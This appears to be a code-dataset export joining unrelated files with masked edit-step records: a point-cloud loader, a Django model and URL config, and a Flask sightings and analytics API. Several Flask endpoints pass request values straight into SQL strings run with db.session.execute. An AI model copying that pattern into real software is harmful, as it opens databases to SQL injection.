return np.concatenate([outx, outy, outz], axis=2)
def augment(x):
bs = x.shape[0]
# rotation
min_rot, max_rot = -0.1, 0.1
thetas = np.random.uniform(min_rot, max_rot, [bs, 1]) * np.pi
rotated = rotate_z(thetas, x)
# scaling
min_scale, max_scale = 0.8, 1.25
scale = np.random.rand(bs, 1, 3) * (max_scale - min_scale) + min_scale
return rotated * scale
def standardize(x):
clipper = np.mean(np.abs(x), (1, 2), keepdims=True)
z = np.clip(x, -100 * clipper, 100 * clipper)
mean = np.mean(z, (1, 2), keepdims=True)
std = np.std(z, (1, 2), keepdims=True)
return (z - mean) / std
class ModelFetcher(object):
def __init__(
self,
fname,
batch_size,
down_sample=10,
do_standardize=True,
do_augmentation=False,
):
self.fname = fname
self.batch_size = batch_size
self.down_sample = down_sample
with h5py.File(fname, "r") as f:
self._train_data = np.array(f["tr_cloud"])
self._train_label = np.array(f["tr_labels"])
self._test_data = np.array(f["test_cloud"])
self._test_label = np.array(f["test_labels"])
self.num_classes = np.max(self._train_label) + 1
self.num_train_batches = len(self._train_data) // self.batch_size
self.num_test_batches = len(self._test_data) // self.batch_size
self.prep1 = standardize if do_standardize else lambda x: x
self.prep2 = (
(lambda x: augment(self.prep1(x))) if do_augmentation else self.prep1
)
assert (
len(self._train_data) > self.batch_size
), "Batch size larger than number of training examples"
# select the subset of points to use throughout beforehand
self.perm = np.random.permutation(self._train_data.shape[1])[
:: self.down_sample
]
def train_data(self):
rng_state = np.random.get_state()
np.random.shuffle(self._train_data)
np.random.set_state(rng_state)
np.random.shuffle(self._train_label)
return self.next_train_batch()
def next_train_batch(self):
start = 0
end = self.batch_size
N = len(self._train_data)
perm = self.perm
batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)
while end < N:
yield self.prep2(
self._train_data[start:end, perm]
), batch_card, self._train_label[start:end]
start = end
end += self.batch_size
def test_data(self):
return self.next_test_batch()
def next_test_batch(self):
start = 0
end = self.batch_size
N = len(self._test_data)
batch_card = (self._train_data.shape[1] // self.down_sample) * np.ones(
self.batch_size, dtype=np.int32
)
while end < N:
yield self.prep1(
self._test_data[start:end, 1 :: self.down_sample]
), batch_card, self._test_label[start:end]
start = end
end += self.batch_size
|
flexible
|
{
"blob_id": "855bfc9420a5d5031cc673231cc7993ac67df076",
"index": 5515,
"step-1": "<mask token>\n\n\nclass ModelFetcher(object):\n <mask token>\n\n def train_data(self):\n rng_state = np.random.get_state()\n np.random.shuffle(self._train_data)\n np.random.set_state(rng_state)\n np.random.shuffle(self._train_label)\n return self.next_train_batch()\n <mask token>\n <mask token>\n\n def next_test_batch(self):\n start = 0\n end = self.batch_size\n N = len(self._test_data)\n batch_card = self._train_data.shape[1] // self.down_sample * np.ones(\n self.batch_size, dtype=np.int32)\n while end < N:\n yield self.prep1(self._test_data[start:end, 1::self.down_sample]\n ), batch_card, self._test_label[start:end]\n start = end\n end += self.batch_size\n",
"step-2": "<mask token>\n\n\nclass ModelFetcher(object):\n\n def __init__(self, fname, batch_size, down_sample=10, do_standardize=\n True, do_augmentation=False):\n self.fname = fname\n self.batch_size = batch_size\n self.down_sample = down_sample\n with h5py.File(fname, 'r') as f:\n self._train_data = np.array(f['tr_cloud'])\n self._train_label = np.array(f['tr_labels'])\n self._test_data = np.array(f['test_cloud'])\n self._test_label = np.array(f['test_labels'])\n self.num_classes = np.max(self._train_label) + 1\n self.num_train_batches = len(self._train_data) // self.batch_size\n self.num_test_batches = len(self._test_data) // self.batch_size\n self.prep1 = standardize if do_standardize else lambda x: x\n self.prep2 = (lambda x: augment(self.prep1(x))\n ) if do_augmentation else self.prep1\n assert len(self._train_data\n ) > self.batch_size, 'Batch size larger than number of training examples'\n self.perm = np.random.permutation(self._train_data.shape[1])[::self\n .down_sample]\n\n def train_data(self):\n rng_state = np.random.get_state()\n np.random.shuffle(self._train_data)\n np.random.set_state(rng_state)\n np.random.shuffle(self._train_label)\n return self.next_train_batch()\n\n def next_train_batch(self):\n start = 0\n end = self.batch_size\n N = len(self._train_data)\n perm = self.perm\n batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)\n while end < N:\n yield self.prep2(self._train_data[start:end, perm]\n ), batch_card, self._train_label[start:end]\n start = end\n end += self.batch_size\n\n def test_data(self):\n return self.next_test_batch()\n\n def next_test_batch(self):\n start = 0\n end = self.batch_size\n N = len(self._test_data)\n batch_card = self._train_data.shape[1] // self.down_sample * np.ones(\n self.batch_size, dtype=np.int32)\n while end < N:\n yield self.prep1(self._test_data[start:end, 1::self.down_sample]\n ), batch_card, self._test_label[start:end]\n start = end\n end += self.batch_size\n",
"step-3": "<mask token>\n\n\ndef rotate_z(theta, x):\n theta = np.expand_dims(theta, 1)\n outz = np.expand_dims(x[:, :, 2], 2)\n sin_t = np.sin(theta)\n cos_t = np.cos(theta)\n xx = np.expand_dims(x[:, :, 0], 2)\n yy = np.expand_dims(x[:, :, 1], 2)\n outx = cos_t * xx - sin_t * yy\n outy = sin_t * xx + cos_t * yy\n return np.concatenate([outx, outy, outz], axis=2)\n\n\ndef augment(x):\n bs = x.shape[0]\n min_rot, max_rot = -0.1, 0.1\n thetas = np.random.uniform(min_rot, max_rot, [bs, 1]) * np.pi\n rotated = rotate_z(thetas, x)\n min_scale, max_scale = 0.8, 1.25\n scale = np.random.rand(bs, 1, 3) * (max_scale - min_scale) + min_scale\n return rotated * scale\n\n\n<mask token>\n\n\nclass ModelFetcher(object):\n\n def __init__(self, fname, batch_size, down_sample=10, do_standardize=\n True, do_augmentation=False):\n self.fname = fname\n self.batch_size = batch_size\n self.down_sample = down_sample\n with h5py.File(fname, 'r') as f:\n self._train_data = np.array(f['tr_cloud'])\n self._train_label = np.array(f['tr_labels'])\n self._test_data = np.array(f['test_cloud'])\n self._test_label = np.array(f['test_labels'])\n self.num_classes = np.max(self._train_label) + 1\n self.num_train_batches = len(self._train_data) // self.batch_size\n self.num_test_batches = len(self._test_data) // self.batch_size\n self.prep1 = standardize if do_standardize else lambda x: x\n self.prep2 = (lambda x: augment(self.prep1(x))\n ) if do_augmentation else self.prep1\n assert len(self._train_data\n ) > self.batch_size, 'Batch size larger than number of training examples'\n self.perm = np.random.permutation(self._train_data.shape[1])[::self\n .down_sample]\n\n def train_data(self):\n rng_state = np.random.get_state()\n np.random.shuffle(self._train_data)\n np.random.set_state(rng_state)\n np.random.shuffle(self._train_label)\n return self.next_train_batch()\n\n def next_train_batch(self):\n start = 0\n end = self.batch_size\n N = len(self._train_data)\n perm = self.perm\n batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)\n while end < N:\n yield self.prep2(self._train_data[start:end, perm]\n ), batch_card, self._train_label[start:end]\n start = end\n end += self.batch_size\n\n def test_data(self):\n return self.next_test_batch()\n\n def next_test_batch(self):\n start = 0\n end = self.batch_size\n N = len(self._test_data)\n batch_card = self._train_data.shape[1] // self.down_sample * np.ones(\n self.batch_size, dtype=np.int32)\n while end < N:\n yield self.prep1(self._test_data[start:end, 1::self.down_sample]\n ), batch_card, self._test_label[start:end]\n start = end\n end += self.batch_size\n",
"step-4": "import numpy as np\nimport h5py\n\n\ndef rotate_z(theta, x):\n theta = np.expand_dims(theta, 1)\n outz = np.expand_dims(x[:, :, 2], 2)\n sin_t = np.sin(theta)\n cos_t = np.cos(theta)\n xx = np.expand_dims(x[:, :, 0], 2)\n yy = np.expand_dims(x[:, :, 1], 2)\n outx = cos_t * xx - sin_t * yy\n outy = sin_t * xx + cos_t * yy\n return np.concatenate([outx, outy, outz], axis=2)\n\n\ndef augment(x):\n bs = x.shape[0]\n min_rot, max_rot = -0.1, 0.1\n thetas = np.random.uniform(min_rot, max_rot, [bs, 1]) * np.pi\n rotated = rotate_z(thetas, x)\n min_scale, max_scale = 0.8, 1.25\n scale = np.random.rand(bs, 1, 3) * (max_scale - min_scale) + min_scale\n return rotated * scale\n\n\ndef standardize(x):\n clipper = np.mean(np.abs(x), (1, 2), keepdims=True)\n z = np.clip(x, -100 * clipper, 100 * clipper)\n mean = np.mean(z, (1, 2), keepdims=True)\n std = np.std(z, (1, 2), keepdims=True)\n return (z - mean) / std\n\n\nclass ModelFetcher(object):\n\n def __init__(self, fname, batch_size, down_sample=10, do_standardize=\n True, do_augmentation=False):\n self.fname = fname\n self.batch_size = batch_size\n self.down_sample = down_sample\n with h5py.File(fname, 'r') as f:\n self._train_data = np.array(f['tr_cloud'])\n self._train_label = np.array(f['tr_labels'])\n self._test_data = np.array(f['test_cloud'])\n self._test_label = np.array(f['test_labels'])\n self.num_classes = np.max(self._train_label) + 1\n self.num_train_batches = len(self._train_data) // self.batch_size\n self.num_test_batches = len(self._test_data) // self.batch_size\n self.prep1 = standardize if do_standardize else lambda x: x\n self.prep2 = (lambda x: augment(self.prep1(x))\n ) if do_augmentation else self.prep1\n assert len(self._train_data\n ) > self.batch_size, 'Batch size larger than number of training examples'\n self.perm = np.random.permutation(self._train_data.shape[1])[::self\n .down_sample]\n\n def train_data(self):\n rng_state = np.random.get_state()\n np.random.shuffle(self._train_data)\n np.random.set_state(rng_state)\n np.random.shuffle(self._train_label)\n return self.next_train_batch()\n\n def next_train_batch(self):\n start = 0\n end = self.batch_size\n N = len(self._train_data)\n perm = self.perm\n batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)\n while end < N:\n yield self.prep2(self._train_data[start:end, perm]\n ), batch_card, self._train_label[start:end]\n start = end\n end += self.batch_size\n\n def test_data(self):\n return self.next_test_batch()\n\n def next_test_batch(self):\n start = 0\n end = self.batch_size\n N = len(self._test_data)\n batch_card = self._train_data.shape[1] // self.down_sample * np.ones(\n self.batch_size, dtype=np.int32)\n while end < N:\n yield self.prep1(self._test_data[start:end, 1::self.down_sample]\n ), batch_card, self._test_label[start:end]\n start = end\n end += self.batch_size\n",
"step-5": "import numpy as np\nimport h5py\n\n\ndef rotate_z(theta, x):\n theta = np.expand_dims(theta, 1)\n outz = np.expand_dims(x[:, :, 2], 2)\n sin_t = np.sin(theta)\n cos_t = np.cos(theta)\n xx = np.expand_dims(x[:, :, 0], 2)\n yy = np.expand_dims(x[:, :, 1], 2)\n outx = cos_t * xx - sin_t * yy\n outy = sin_t * xx + cos_t * yy\n return np.concatenate([outx, outy, outz], axis=2)\n\n\ndef augment(x):\n bs = x.shape[0]\n # rotation\n min_rot, max_rot = -0.1, 0.1\n thetas = np.random.uniform(min_rot, max_rot, [bs, 1]) * np.pi\n rotated = rotate_z(thetas, x)\n # scaling\n min_scale, max_scale = 0.8, 1.25\n scale = np.random.rand(bs, 1, 3) * (max_scale - min_scale) + min_scale\n return rotated * scale\n\n\ndef standardize(x):\n clipper = np.mean(np.abs(x), (1, 2), keepdims=True)\n z = np.clip(x, -100 * clipper, 100 * clipper)\n mean = np.mean(z, (1, 2), keepdims=True)\n std = np.std(z, (1, 2), keepdims=True)\n return (z - mean) / std\n\n\nclass ModelFetcher(object):\n def __init__(\n self,\n fname,\n batch_size,\n down_sample=10,\n do_standardize=True,\n do_augmentation=False,\n ):\n\n self.fname = fname\n self.batch_size = batch_size\n self.down_sample = down_sample\n\n with h5py.File(fname, \"r\") as f:\n self._train_data = np.array(f[\"tr_cloud\"])\n self._train_label = np.array(f[\"tr_labels\"])\n self._test_data = np.array(f[\"test_cloud\"])\n self._test_label = np.array(f[\"test_labels\"])\n\n self.num_classes = np.max(self._train_label) + 1\n\n self.num_train_batches = len(self._train_data) // self.batch_size\n self.num_test_batches = len(self._test_data) // self.batch_size\n\n self.prep1 = standardize if do_standardize else lambda x: x\n self.prep2 = (\n (lambda x: augment(self.prep1(x))) if do_augmentation else self.prep1\n )\n\n assert (\n len(self._train_data) > self.batch_size\n ), \"Batch size larger than number of training examples\"\n\n # select the subset of points to use throughout beforehand\n self.perm = np.random.permutation(self._train_data.shape[1])[\n :: self.down_sample\n ]\n\n def train_data(self):\n rng_state = np.random.get_state()\n np.random.shuffle(self._train_data)\n np.random.set_state(rng_state)\n np.random.shuffle(self._train_label)\n return self.next_train_batch()\n\n def next_train_batch(self):\n start = 0\n end = self.batch_size\n N = len(self._train_data)\n perm = self.perm\n batch_card = len(perm) * np.ones(self.batch_size, dtype=np.int32)\n while end < N:\n yield self.prep2(\n self._train_data[start:end, perm]\n ), batch_card, self._train_label[start:end]\n start = end\n end += self.batch_size\n\n def test_data(self):\n return self.next_test_batch()\n\n def next_test_batch(self):\n start = 0\n end = self.batch_size\n N = len(self._test_data)\n batch_card = (self._train_data.shape[1] // self.down_sample) * np.ones(\n self.batch_size, dtype=np.int32\n )\n while end < N:\n yield self.prep1(\n self._test_data[start:end, 1 :: self.down_sample]\n ), batch_card, self._test_label[start:end]\n start = end\n end += self.batch_size\n",
"step-ids": [
3,
6,
8,
10,
11
]
}
|
[
3,
6,
8,
10,
11
] |
from django.db import models
import eav
from django.utils import timezone
class RiskType(models.Model):
"""A model class used for storing data
about risk types
"""
name = models.CharField(max_length=255)
created = models.DateTimeField(default=timezone.now)
modified = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('name',)
def __str__(self):
return self.name
eav.register(RiskType)
|
normal
|
{
"blob_id": "635b75bc12718bccdfb9d04a54476c93fa4685ce",
"index": 4661,
"step-1": "<mask token>\n\n\nclass RiskType(models.Model):\n <mask token>\n name = models.CharField(max_length=255)\n created = models.DateTimeField(default=timezone.now)\n modified = models.DateTimeField(auto_now=True)\n\n\n class Meta:\n ordering = 'name',\n\n def __str__(self):\n return self.name\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass RiskType(models.Model):\n \"\"\"A model class used for storing data\n about risk types\n \"\"\"\n name = models.CharField(max_length=255)\n created = models.DateTimeField(default=timezone.now)\n modified = models.DateTimeField(auto_now=True)\n\n\n class Meta:\n ordering = 'name',\n\n def __str__(self):\n return self.name\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass RiskType(models.Model):\n \"\"\"A model class used for storing data\n about risk types\n \"\"\"\n name = models.CharField(max_length=255)\n created = models.DateTimeField(default=timezone.now)\n modified = models.DateTimeField(auto_now=True)\n\n\n class Meta:\n ordering = 'name',\n\n def __str__(self):\n return self.name\n\n\neav.register(RiskType)\n",
"step-4": "from django.db import models\nimport eav\nfrom django.utils import timezone\n\n\nclass RiskType(models.Model):\n \"\"\"A model class used for storing data\n about risk types\n \"\"\"\n name = models.CharField(max_length=255)\n created = models.DateTimeField(default=timezone.now)\n modified = models.DateTimeField(auto_now=True)\n\n\n class Meta:\n ordering = 'name',\n\n def __str__(self):\n return self.name\n\n\neav.register(RiskType)\n",
"step-5": "from django.db import models\nimport eav\nfrom django.utils import timezone\n\n\nclass RiskType(models.Model):\n \"\"\"A model class used for storing data\n about risk types\n \"\"\"\n name = models.CharField(max_length=255)\n created = models.DateTimeField(default=timezone.now)\n modified = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = ('name',)\n\n def __str__(self):\n return self.name\n\n\neav.register(RiskType)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = patterns('', url('^$', DomainListView.as_view()), url(
'^admin/', include(admin.site.urls)), url('^domains/', include(
'metainfo.urls', namespace='domains')))
<|reserved_special_token_1|>
from django.conf.urls import patterns, include, url
from django.contrib import admin
from metainfo.views import DomainListView
urlpatterns = patterns('', url('^$', DomainListView.as_view()), url(
'^admin/', include(admin.site.urls)), url('^domains/', include(
'metainfo.urls', namespace='domains')))
<|reserved_special_token_1|>
from django.conf.urls import patterns, include, url
from django.contrib import admin
from metainfo.views import DomainListView
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'metapull.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', DomainListView.as_view()),
url(r'^admin/', include(admin.site.urls)),
url(r'^domains/', include('metainfo.urls', namespace = 'domains')),
)
|
flexible
|
{
"blob_id": "1599f5e49ec645b6d448e74719e240343077aedd",
"index": 5464,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = patterns('', url('^$', DomainListView.as_view()), url(\n '^admin/', include(admin.site.urls)), url('^domains/', include(\n 'metainfo.urls', namespace='domains')))\n",
"step-3": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom metainfo.views import DomainListView\nurlpatterns = patterns('', url('^$', DomainListView.as_view()), url(\n '^admin/', include(admin.site.urls)), url('^domains/', include(\n 'metainfo.urls', namespace='domains')))\n",
"step-4": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom metainfo.views import DomainListView\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'metapull.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^$', DomainListView.as_view()),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^domains/', include('metainfo.urls', namespace = 'domains')),\n)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# app/__init__.py
import json
from flask_api import FlaskAPI, status
import graphene
from graphene import relay
from graphene_sqlalchemy import SQLAlchemyConnectionField, SQLAlchemyObjectType
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import func
from flask import request, jsonify, abort, make_response
from flask_graphql import GraphQLView
from shapely.geometry import shape, Point
# local import
from instance.config import app_config
# For password hashing
from flask_bcrypt import Bcrypt
# initialize db
db = SQLAlchemy()
from app.models import Date, Area, LTESighting, SmallCell, Site, SightingsPerHourPerCountry, SightingsNew, SightingsBase, WideSighting, Journey
from app.models import Department as DepartmentModel
from app.ng_event_models import ZoneDistrict, AttractionTotal, Profile, PurchDistrict, DOWFrequency
class Department(SQLAlchemyObjectType):
class Meta:
model = DepartmentModel
interfaces = (relay.Node, )
class Query(graphene.ObjectType):
node = relay.Node.Field()
all_employees = SQLAlchemyConnectionField(Department)
def create_app(config_name):
app = FlaskAPI(__name__, instance_relative_config=True)
# overriding Werkzeugs built-in password hashing utilities using Bcrypt.
bcrypt = Bcrypt(app)
schema = graphene.Schema(query=Query)
app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql', schema=schema, graphiql=True))
app.config.from_object(app_config[config_name])
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
@app.route('/api/areas/create', methods=['POST'])
def create_areas():
# get the access token
name = request.data.get('name', '')
geodata = request.data.get('geodata', '')
center_lat = request.data.get('center_lat')
center_lng = request.data.get('center_lng')
zoom = request.data.get('zoom')
area = Area(name=name, geodata=geodata, center_lat=center_lat, center_lng=center_lng, zoom=zoom)
area.save()
response = jsonify({
'id': area.id,
'name': area.name,
'geodata': area.geodata,
'center_lat' : area.center_lat,
'center_lng' : area.center_lng,
'zoom' : area.zoom,
'date_created': area.date_created,
'date_modified': area.date_modified
})
return make_response(response), 201
@app.route('/api/areas/delete', methods=['POST'])
def delete_areas():
# get the access token
id = request.data.get('id', 0)
area = Area.query.filter_by(id=id).first()
if (area is not None):
area.delete()
return make_response(jsonify({'id':id})), 200
@app.route('/api/sightingsperhour', methods=['GET'])
def get_sightingsperhour():
# get all the areas
sightings = SightingsPerHourPerCountry.query.all()
results = []
for sighting in sightings:
results.append({'country' : sighting.country, 'hour' : sighting.hour, 'count' : sighting.count})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sightingsnew', methods=['POST'])
def sightingsnew():
sightings = db.session.query(SightingsBase.site_id, SightingsBase.country, func.count(SightingsBase.roundedtoday))\
.filter(SightingsBase.site_id.in_(request.data['selectedRow']))\
.filter(SightingsBase.roundedtoday.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))\
.group_by(SightingsBase.site_id, SightingsBase.country)\
.order_by(SightingsBase.site_id, func.count(SightingsBase.roundedtoday).desc())\
results = []
for sighting in sightings.all():
results.append({'country' : sighting.country, 'site_id' : sighting.site_id, 'count' : sighting[2]})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/widesightingsnew', methods=['POST', 'GET'])
def widesightingsnew():
sightings = db.session.query(WideSighting.site_id, WideSighting.gender, func.count(WideSighting.gender))\
.filter(WideSighting.site_id.in_([138, 134]))\
.group_by(WideSighting.site_id, WideSighting.gender)
results = []
for sighting in sightings.all():
#gender = sighting.gender if len(sighting.gender) else 'unknown'
results.append({'site_id' : sighting.site_id, 'gender' : sighting.gender, 'count' : sighting[2]})
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/widesightings', methods=['GET'])
def widesightings():
sightings = WideSighting.get_all()
results = []
for sighting in sightings:
results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sites', methods=['GET'])
def get_sites():
# get all the areas
sites = Site.get_all()
results = []
for site in sites:
results.append(site.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/dates', methods=['GET'])
def get_dates():
# get all the areas
dates = Date.get_all()
results = []
for date in dates:
results.append(date.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/areas', methods=['GET'])
def get_areas():
# get all the areas
areas = Area.get_all()
allSmallCells = SmallCell.get_all()
results = []
for area in areas:
smallcellInArea = []
for smallcell in allSmallCells:
smallcellInArea.append(smallcell.serialise())
obj = {
'id': area.id,
'name': area.name,
'date_created': area.date_created,
'date_modified': area.date_modified,
'center_lat' : area.center_lat,
'center_lng' : area.center_lng,
'zoom' : area.zoom,
'geodata': area.geodata,
'smallcells' : smallcellInArea
}
results.append(obj)
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/smallcells', methods=['GET'])
def get_smallcells():
allSmallCells = SmallCell.query.order_by(SmallCell.id).all()
results = []
for smallcell in allSmallCells:
results.append(smallcell.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/smallcells/update', methods=['POST'])
def update_smallcell():
smallcell_id = request.data.get('id', '')
site_id = request.data.get('site_id', '')
smallcell = SmallCell.query.filter_by(id=smallcell_id).first()
smallcell.site_id = site_id
smallcell.save()
return make_response(jsonify({ 'smallcell_id' : smallcell.id, 'site_id' : smallcell.site_id })), 200
@app.route('/api/sighting/byarea/<areaid>', methods=['GET'])
def get_sighting(areaid):
import string
area = Area.query.filter_by(id=areaid).first()
if area is None : return make_response(jsonify({ 'list' : [] })), 200
sites = []
for site in Site.get_all():
if area.contains(site):
sites.append(str(site.id))
def generate_random_data(num_rows):
import random
latitude = 51.51451110408478
longitude = -0.12620388576521444
result = []
for _ in range(num_rows):
dec_lat = random.random()/10
dec_lon = random.random()/10
result.append({'lat' : latitude + dec_lat, 'lng' : longitude + dec_lon})
return result
results = []
if (len(sites) > 0):
for row in db.session.execute('select * from get_gender_crossfilter(ARRAY[' + ','.join(sites) + '])'):
results.append(({ 'geos': generate_random_data(5), 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'timestamp' : row['__sighting_date'], 'count' : row['__count'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting/getgender/', methods=['POST'])
def get_gender():
site_ids = str(request.data.get('site_ids', ''))
from_sighting_date = request.data.get('selectedDates')[0]
to_sighting_date = request.data.get('selectedDates')[1]
import string
results = []
for row in db.session.execute("select * from get_gender(ARRAY[" + site_ids + "]," + "'" + from_sighting_date + "'" + "," + "'" + to_sighting_date + "'" + ")"):
results.append(({ 'site_id' : row['__site_id'], 'date_month' : row['__date_month'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'perc_visits' : row['__perc_visits'], 'scaled_visits' : row['__scaled_visits'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting/getgendertotals/', methods=['POST'])
def get_gender_age_totals():
site_ids = str(request.data.get('site_ids', ''))
from_sighting_date = request.data.get('selectedDates')[0]
to_sighting_date = request.data.get('selectedDates')[1]
import string
results = []
for row in db.session.execute("select * from get_gender_age_totals(ARRAY[" + site_ids + "]," + "'" + from_sighting_date + "'" + "," + "'" + to_sighting_date + "'" + ")"):
results.append(({ 'site_id' : row['__site_id'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], '__visits' : row['__visits'] }))
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sighting', methods=['GET'])
def get_sightings():
results = []
for sighting in LTESighting.get_all():
results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/sitescomparison', methods=['POST'])
def get_sitescomparison():
sightings = LTESighting.query\
.filter(LTESighting.smallcell.has(SmallCell.site_id.in_(request.data['selectedRow'])))\
.filter(LTESighting.timestamp.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))
return make_response(jsonify({ 'list' : [sighting.serialise() for sighting in sightings] })), 200
@app.route('/api/sighting/bysite', methods=['GET'])
def get_sightings_by_site():
site_ids = (request.args.getlist('site_id'))
results = []
#should do this better with joins!
for sighting in LTESighting.query:
if (str(sighting.smallcell.site_id)) in site_ids : results.append(sighting.serialise())
return make_response(jsonify({ 'list' : results })), 200
@app.route('/api/origindestination/all', methods=['GET'])
def get_all():
journeys = Journey.query.all()
thing = {}
for journey in journeys:
if (journey.origin_id not in thing) :
thing[journey.origin_id] = {}
if (journey.destination_id not in thing[journey.origin_id] and journey.destination_id != journey.origin_id) :
thing[journey.origin_id][journey.destination_id] = journey.data['total']
return make_response(jsonify(thing)), 200
@app.route('/api/origindestination/<origin_id>', methods=['GET'])
def get_od(origin_id):
journeys = Journey.query.all()#.filter_by(origin_id=origin_id).all()
_j = []
for journey in journeys:
_j.append({'origin_id' : journey.origin_id, 'destination_id' : journey.destination_id, 'total' : journey.data['total']})
#_j.append({'origin_id' : journey.origin_id, 'data' : (journey.data)})
return make_response(jsonify({ 'list' : _j })), 200
@app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>', methods=['GET'])
def purchase(home_district_name, type_visitor):
days_sql = db.session.query(PurchDistrict.start_dow, func.count(PurchDistrict.start_dow))\
.group_by(PurchDistrict.start_dow)\
.filter(PurchDistrict.home_district_name.in_([home_district_name]))\
.filter(PurchDistrict.type_visitor.in_([type_visitor]))\
.order_by(func.count(PurchDistrict.start_dow).desc())\
.all()
gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender)\
.filter(PurchDistrict.home_district_name.in_([home_district_name]))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_age_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender, PurchDistrict.age)\
.filter(PurchDistrict.gender.isnot(None))\
.filter(PurchDistrict.age.isnot(None))\
.filter(PurchDistrict.home_district_name.in_([home_district_name]))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\
.filter(PurchDistrict.gender.isnot(None))\
.filter(PurchDistrict.age.isnot(None))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
days_total = sum(i[1] for i in days_sql)
gender_total = sum(i[1] for i in gender_sql)
gender_age_total = sum(i[2] for i in gender_age_sql)
days_results = []
for result in days_sql:
days_results.append({ 'start_dow' : result.start_dow, 'count' : result[1], 'percent' : float(result[1])/float(days_total), 'total' : days_total})
gender_results = []
for result in gender_sql:
gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})
gender_age_results = []
for result in gender_age_sql:
gender_age_results.append({'gender' : result.gender, 'age' : result.age, 'count' : result[2], 'percent' : float(result[2])/float(gender_age_total)})
return make_response(jsonify({'days' : days_results, 'gender' : gender_results, 'gender_age' : gender_age_results})), 200
@app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=['GET'])
def purchase_rent(type_visitor):
gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender)\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\
.group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\
.filter(PurchDistrict.gender.isnot(None))\
.filter(PurchDistrict.age.isnot(None))\
.filter(PurchDistrict.type_visitor.in_([type_visitor])).all()
gender_total = sum(i[1] for i in gender_sql)
gender_results = []
for result in gender_sql:
gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})
gender_age_rent_results = []
for result in gender_age_rent_sql:
gender_age_rent_results.append({'gender' : result.gender, 'age' : result.age, 'rent' : result.rent, 'count' : result[3]})
return make_response(jsonify({'gender' : gender_results, 'gender_age_rent' : gender_age_rent_results})), 200
@app.route('/api/ng_event/districts', methods=['GET'])
def districts():
home_results = []
for result in db.session.query(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name).all():
home_results.append({'district_code' : result.home_district_code, 'district_name' : result.home_district_name, 'visitors' : result[2]})
work_results = []
for result in db.session.query(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name).all():
work_results.append({'district_code' : result.work_district_code, 'district_name' : result.work_district_name, 'visitors' : result[2]})
return make_response(jsonify({'work' : { 'list' : work_results }, 'home' : { 'list' : home_results }})), 200
@app.route('/api/ng_event/attractiontotals', methods=['GET'])
def attractiontotals():
results = []
for result in db.session.query(AttractionTotal.zone_visitors, AttractionTotal.num_visitors).all():
results.append({'zone_visitors' : result.zone_visitors, 'num_visitors' : result.num_visitors})
return make_response(jsonify({'totals' : { 'list' : results }})), 200
